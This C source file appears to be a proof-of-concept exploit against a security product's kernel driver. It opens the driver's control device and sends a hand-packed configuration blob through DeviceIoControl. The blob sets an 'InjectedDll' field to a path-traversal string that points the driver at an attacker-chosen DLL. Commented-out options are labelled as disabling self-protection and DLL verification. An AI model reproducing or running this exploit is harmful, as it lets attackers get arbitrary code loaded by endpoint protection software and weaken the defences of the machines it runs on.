#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include "globals.h"
BOOL SendIoctl(HANDLE hDevice, DWORD ioctlCode, void* inputBuffer, DWORD inputSize);
// Header of the configuration blob passed to CMD_ERDDRV_IOCTL_SET_CONFIG.
// Declared for reference only: main() sends the hand-packed `buffer` below and
// never instantiates this struct. NOTE(review): no packing pragma is applied,
// so sizeof(struct LbvsHeader) includes alignment padding and does not equal
// the 10-byte header laid out in `buffer` — do not use it as an overlay type.
struct LbvsHeader
{
uint32_t nMagic; // 'SVBL' = 0x4C425653
uint8_t nVersion; // usually 1
uint32_t nSize; // total buffer size (header + items + data)
uint8_t nCount; // number of items
};
// Per-item header that precedes each field's value inside the blob.
// Reference only, like LbvsHeader: the bytes in `buffer` are packed by hand.
struct FieldHeader
{
uint16_t eId; // FieldId (e.g. 6 = LogFile)
uint8_t eType; // FieldType (e.g. 2 = WString)
};
// Hand-packed configuration blob sent with CMD_ERDDRV_IOCTL_SET_CONFIG.
// Laid out as raw bytes rather than through the structs above, so struct
// padding never influences the wire format. Multi-byte integers are
// little-endian. sizeof(buffer) is what main() passes as the IOCTL input size.
unsigned char buffer[] = {
// Header (LbvsHeader layout, 10 bytes)
0x4c, 0x42, 0x56, 0x53, // nMagic = 'SVBL'
0x01, // nVersion = 1
100, 0x00, 0x00, 0x00, // nSize
0x02, //nCount = 2 items follow
// Item 1: FieldHeader eId = 5, eType = 5, followed by the bytes 3,0,0,0
5,0,5,3,0,0,0, // loglevel
//0,0,4,0, // Disable self protection
//15,0,4,0, // DLL verify
// Item 2: FieldHeader eId = 14, eType = 2 (WString per the FieldHeader
// comment). The value is UTF-16LE, one code unit per line below.
14,0,2, // InjectedDll and int
0x63,0x00, // 'c'
0x3A,0x00, // ':'
0x5C,0x00, // '\'
0x77,0x00, // 'w'
0x69,0x00, // 'i'
0x6E,0x00, // 'n'
0x64,0x00, // 'd'
0x6F,0x00, // 'o'
0x77,0x00, // 'w'
0x73,0x00, // 's'
0x5C,0x00, // '\'
0x73,0x00, // 's'
0x79,0x00, // 'y'
0x73,0x00, // 's'
0x74,0x00, // 't'
0x65,0x00, // 'e'
0x6D,0x00, // 'm'
0x33,0x00, // '3'
0x32,0x00, // '2'
0x5C,0x00, // '\'
0x2E,0x00, // '.'
0x2E,0x00, // '.'
0x2f,0x00, // '/'
0x2E,0x00, // '.'
0x2E,0x00, // '.'
0x2f,0x00, // '/'
0x73,0x00, // 's'
0x74,0x00, // 't'
0x2f,0x00, // '/'
0x74,0x00, // 't'
0x2E,0x00, // '.'
0x64,0x00, // 'd'
0x6C,0x00, // 'l'
0x6C,0x00, // 'l'
0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // UTF-16 null terminator followed by zero padding
};
/*
 * Entry point: opens the driver's control device, issues a
 * START / SET_CONFIG / STOP / START sequence through SendIoctl, then closes
 * the handle.
 *
 * Returns 1 only when the device cannot be opened. A failed IOCTL is reported
 * by SendIoctl and the sequence simply continues, so the exit code is 0 even
 * if every IOCTL failed.
 *
 * `nullptr` below means this translation unit is built as C++ (or C23), not
 * C11.
 */
int main()
{
// CMD_ERDDRV_* names are not defined in this file; presumably they come from
// globals.h — verify there.
HANDLE hDevice = CreateFileW(
CMD_ERDDRV_IOCTLDEVICE_WIN32_NAME, GENERIC_READ | GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("[-] Error while opening device: %lu\n", GetLastError());
return 1;
}
printf("[+] Device opened.\n");
// Start monitoring. Failure is logged only; execution continues.
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_START, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_START.\n");
}
// Send the hand-packed configuration blob defined above.
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_SET_CONFIG, buffer, sizeof(buffer))) {
printf("[-] Error CMD_ERDDRV_IOCTL_SET_CONFIG.\n");
}
// Stop monitoring ...
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_STOP, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_STOP.\n");
}
// ... and start it again (presumably so the driver re-reads its configuration
// — confirm against the driver).
if (!SendIoctl(hDevice, CMD_ERDDRV_IOCTL_START, NULL, 0)) {
printf("[-] Error CMD_ERDDRV_IOCTL_START.\n");
}
CloseHandle(hDevice);
printf("[+] Deviced closed.\n");
return 0;
}
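/*
 * SendIoctl - issue one synchronous DeviceIoControl request on an open device
 * handle.
 *
 * hDevice     : handle returned by CreateFileW. Not validated here; the caller
 *               rejects INVALID_HANDLE_VALUE before calling.
 * ioctlCode   : control code passed straight through to the driver.
 * inputBuffer : input payload; may be NULL when inputSize is 0.
 * inputSize   : byte length of inputBuffer.
 *
 * Returns TRUE when DeviceIoControl succeeded, FALSE otherwise. The Win32 error
 * code is printed but not returned to the caller. Whatever the driver writes
 * back lands in a fixed 1 KiB scratch buffer and is discarded; only the
 * returned byte count is reported.
 */
BOOL SendIoctl(HANDLE hDevice, DWORD ioctlCode, void* inputBuffer, DWORD inputSize)
{
    BYTE outBuffer[1024] = { 0 }; // scratch output area; enlarge if a request returns more
    DWORD bytesReturned = 0;
    BOOL success = DeviceIoControl(
        hDevice,
        ioctlCode,
        inputBuffer,
        inputSize,
        outBuffer,
        sizeof(outBuffer),
        &bytesReturned,
        NULL // no OVERLAPPED: the call blocks until the driver completes it
    );
    if (!success) {
        // DWORD is unsigned long on Windows, so %lX/%lu are the matching
        // conversions; the previous "%X" was a format/argument type mismatch.
        printf("[-] Error DeviceIoControl 0x%lX: %lu\n", ioctlCode, GetLastError());
        return FALSE;
    }
    printf("[+] IOCTL 0x%lX executed successfully, %lu bytes returned.\n", ioctlCode, bytesReturned);
    return TRUE;
}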